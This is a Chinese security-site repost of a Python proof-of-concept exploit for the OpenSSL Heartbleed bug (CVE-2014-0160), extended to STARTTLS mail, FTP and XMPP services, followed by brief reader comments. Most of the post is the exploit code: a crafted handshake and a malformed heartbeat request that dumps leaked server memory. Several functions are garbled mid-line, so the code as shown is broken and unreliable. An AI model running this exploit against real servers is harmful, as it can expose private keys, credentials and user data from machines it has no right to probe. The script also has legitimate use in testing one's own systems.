openssl 漏洞利用程序,支持smtp, pop3, imap, ftp, or xmpp的POC

admin 2021年4月2日19:57:08评论34 views字数 2669阅读8分53秒阅读模式
#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)

# Modified by Derek Callaway ([email protected]) to add STARTTLS protocols

# The authors disclaim copyright to this source code.

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-s', '--starttls', type='string', default='', help='STARTTLS protocol: smtp, pop3, imap, ftp, or xmpp')

def h2bin(x):
    return x.replace(' ', '').replace('n', '').decode('hex')

hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

hb = h2bin('''
18 03 02 00 03
01 40 00
''')

def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32  0:
        rtime = endtime - time.time()
        if rtime BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False

        if typ == 24:
            print 'Received heartbeat response:'
            hexdump(pay)
            if len(pay) > 3:
                print 'WARNING: server returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True

        if typ == 21:
            print 'Received alert:'
            hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return False

BUFSIZ = 1024

def main():
    opts, args = options.parse_args()

    if len(args) 

source:

https://github.com/decal/ssltest-stls/blob/master/ssltest-stls.py

https://raw.githubusercontent.com/decal/ssltest-stls/master/ssltest-stls.py

相关内容:

openssl 多线程 多域名 EXP,支持自定义端口,保存二进制文件,节省空间

openssl 漏洞利用程序,支持smtp, pop3, imap, ftp, or xmpp的POC

OpenSSL 漏洞利用程序脚本 POC,OpenSSL“heartbleed”重大安全漏洞!

留言评论(旧系统):

佚名 @ 2014-04-10 11:53:17

前排占座!装python 用win7?

本站回复:

额?

佚名 @ 2014-04-10 11:55:18

http://filippo.io/Heartbleed/ 是不是和这个一个道理

本站回复:

Test your server for Heartbleed (CVE-2014-0160)

佚名 @ 2014-04-10 20:45:51

哪位好心人翻译个php版

本站回复:

泽东同志说得好,自己动手丰衣足食!

佚名 @ 2014-04-11 19:13:11

啊!!我家电脑发心脏病了!!

本站回复:

-_-|||

文章来源于lcx.cc:openssl 漏洞利用程序,支持smtp, pop3, imap, ftp, or xmpp的POC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月2日19:57:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   openssl 漏洞利用程序,支持smtp, pop3, imap, ftp, or xmpp的POChttps://cn-sec.com/archives/316946.html

发表评论

匿名网友 填写信息